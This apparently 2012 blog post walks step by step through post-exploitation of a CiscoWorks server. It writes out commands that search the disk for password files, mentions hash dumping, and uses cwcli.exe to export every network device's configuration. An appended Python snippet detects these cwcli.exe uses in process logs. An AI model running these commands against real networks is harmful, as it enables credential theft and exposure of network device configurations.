Tuesday, June 26, 2012

Hack Tips: CiscoWorks Exploitation

by Tony Lee.

This article is the third in a series (See Hack Tips: Blackberry Enterprise Server and Hack Tips: Good For Enterprise) covering, step-by-step, practical post-exploitation tips that can be used to get the most out of various common network servers. This week’s victim is CiscoWorks. Compromising this server allows the attacker to remotely control network devices and dump all device configurations.

Even though CiscoWorks is End of Life (EOL)--replaced by Cisco Prime Infrastructure (CPI)--we still see this management product in many environments, so it is still useful to know how to get the goods from Works.


Overall, the process involves the following steps:
  1. Identifying a CiscoWorks Server
  2. Obtaining CiscoWorks Administrator Credentials
  3. Interfacing with the CiscoWorks Web Interface
  4. Interfacing with the CiscoWorks Command Line Interface
  5. Dumping configs from CiscoWorks

Identifying The Host

  1. Host naming scheme
    • \\CiscoWorksBox
    • \\CISCOWKS
    • \\NETMNG
  2. Application Directory
    • C:\Program Files (x86)\CSCOpx
  3. User accounts
    • casuser (CiscoWorks anonymous access user)
      C:\>net user
      User accounts for \\CiscoWorksDemoBox
      casuser                  user                  user2
      The command completed successfully.
  4. Services
    • The following Windows services are running:
      C:\>net start
         CiscoWorks ANI database engine
         CiscoWorks Daemon Manager
         CiscoWorks RME NG database engine
         CiscoWorks Tomcat Servlet Engine
         CiscoWorks Web Server

Identifying Ciscoworks Account Credentials

  1. Dump the local Windows password hashes and crack them
  2. Data mine the CiscoWorks box for .bat and .txt files that contain plaintext credentials. This is surprisingly successful: network engineers are usually responsible for managing CiscoWorks, and they are notorious for being security ignorant. We recently found a test .bat file that was using ut.exe (a CiscoWorks tool) that disclosed the CiscoWorks credentials in plain text.
    • findstr /I /S /M pass c:\*
    • dir /a /s /b c:\*pass*

Interacting with Ciscoworks

Next we'll take a look at how we can interact with CiscoWorks and pull data from it.

Using the Ciscoworks Web Interface

CiscoWorks interface and options post-authentication

Source: http://www.netadmin.calpoly.edu/tools/cv-images/homepage.jpg

Surf to either of the URLs below for nice screenshots and great summaries:
  • http://hostname:1741
  • https://hostname

From the local system, you can confirm Ciscoworks is listening by checking for a listener on TCP 1741, or TCP 443:
C:\> netstat -ano | findstr 1741
  TCP               LISTENING       5136

C:\>netstat -ano | findstr 443
  TCP               LISTENING       5136

Using the Ciscoworks Command line Application

The CiscoWorks command line application (cwcli.exe) has tons of options, including remotely running commands on devices! This could be very useful for an attacker, but use it with caution, because it could really get you into trouble if you don't know what you're doing!

Running cwcli.exe is more or less straightforward, but you'll definitely want to check out -help for the full list of features.

C:\Program Files (x86)\CSCOpx\bin>cwcli.exe -help
CiscoWorks command line Application.
General syntax to run a command with arguments is

For detailed help on a command and it's arguments, run
cwcli  -help

Dumping Device Configs from CiscoWorks

One noteworthy feature of cwcli.exe is its ability to dump device configurations from the command line! Given enough time, you could obtain every config from every device on the network. Here's how to tell cwcli.exe to grab those configs.

C:\Program Files (x86)\CSCOpx\bin>cwcli.exe export config -u  -p  -device %

        Successful: ConfigExport: C:/PROGRA~2/CSCOpx/files/rme/cwconfig

The % character is a wildcard when using cwcli.exe. Using it, you could potentially dump all configurations from all CiscoWorks-managed devices! Just note that this could take a really long time on a large network. It is also worth noting that, as a general best practice, system administrators should never use the -p option to specify the password on the command line--this includes within scripts, since a password passed that way ends up in process listings, process-creation logs and shell history.

And just to confirm we dumped some configurations:
C:\Program Files (x86)\CSCOpx\bin>dir ..\files\rme\cwconfig
Volume in drive C has no label.
Volume Serial Number is 0000-0000

Directory of C:\Program Files (x86)\CSCOpx\files\rme\cwconfig

12/25/2011  06:40 PM    <DIR>          .
12/25/2011  06:40 PM    <DIR>          ..
12/25/2011  06:40 PM            26,621 2011-11-09-06-40-28-950-devicename.xml
12/25/2011  06:40 PM            26,768 2011-11-09-06-40-29-919-devicename.xml
12/25/2011  06:40 PM            30,782 2011-11-09-06-40-30-294-devicename.xml
12/25/2011  06:40 PM            27,441 2011-11-09-06-40-30-591-devicename.xml
12/25/2011  06:40 PM            30,656 2011-11-09-06-40-30-841-devicename.xml
12/25/2011  06:40 PM            30,833 2011-11-09-06-40-31-247-devicename.xml
               6 File(s)        173,101 bytes
               2 Dir(s)  129,615,876,096 bytes free
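The two cwcli.exe usages called out above (a password passed with -p, and export config with the % wildcard) are both easy to spot in process-creation logging. The following added example, not part of the original post, scans constructed Windows 4688-style event lines for cwcli.exe executions and reports those two conditions with the password redacted; the field names and sample values are assumed for illustration.

```python
import re

# Constructed sample process-creation events (flattened Windows Security 4688
# style fields); these are made-up records, not captured log data.
SAMPLE_EVENTS = [
    'EventID=4688 Account=netadmin NewProcessName=C:\\PROGRA~2\\CSCOpx\\bin\\cwcli.exe '
    'CommandLine="cwcli.exe export config -u admin -p Summer2012! -device %"',
    'EventID=4688 Account=casuser NewProcessName=C:\\PROGRA~2\\CSCOpx\\bin\\cwcli.exe '
    'CommandLine="cwcli.exe -help"',
    'EventID=4688 Account=netadmin NewProcessName=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="cmd.exe /c dir ..\\files\\rme\\cwconfig"',
    'EventID=4688 Account=backup NewProcessName=C:\\PROGRA~2\\CSCOpx\\bin\\cwcli.exe '
    'CommandLine="cwcli.exe export config -u admin -p N3tBackup -device core-sw1"',
]

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Split a flattened key=value event line into a dict (quotes stripped)."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def analyze_event(line):
    """Return a finding dict for a cwcli.exe run worth reviewing, else None.

    Flags a password given via -p (it lands in logs, scripts and history) and
    'export config -device %', which pulls every managed device's config into
    files\\rme\\cwconfig.
    """
    ev = parse_event(line)
    if not ev.get("NewProcessName", "").lower().endswith("\\cwcli.exe"):
        return None
    args = ev.get("CommandLine", "").split()  # assumes no quoted args with spaces
    lower = [a.lower() for a in args]
    findings = []
    if "-p" in lower:
        i = lower.index("-p")
        if i + 1 < len(args) and not args[i + 1].startswith("-"):
            args[i + 1] = "<redacted>"  # never copy the secret into the alert
            findings.append("plaintext_password_on_cmdline")
    if "export" in lower and "config" in lower and "-device" in lower:
        d = lower.index("-device")
        if d + 1 < len(args) and args[d + 1] == "%":
            findings.append("bulk_config_export_all_devices")
    if not findings:
        return None
    return {"account": ev.get("Account"), "findings": findings,
            "command": " ".join(args)}


def scan(events):
    """Run analyze_event over every line and keep the non-empty findings."""
    return [f for f in map(analyze_event, events) if f]
```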

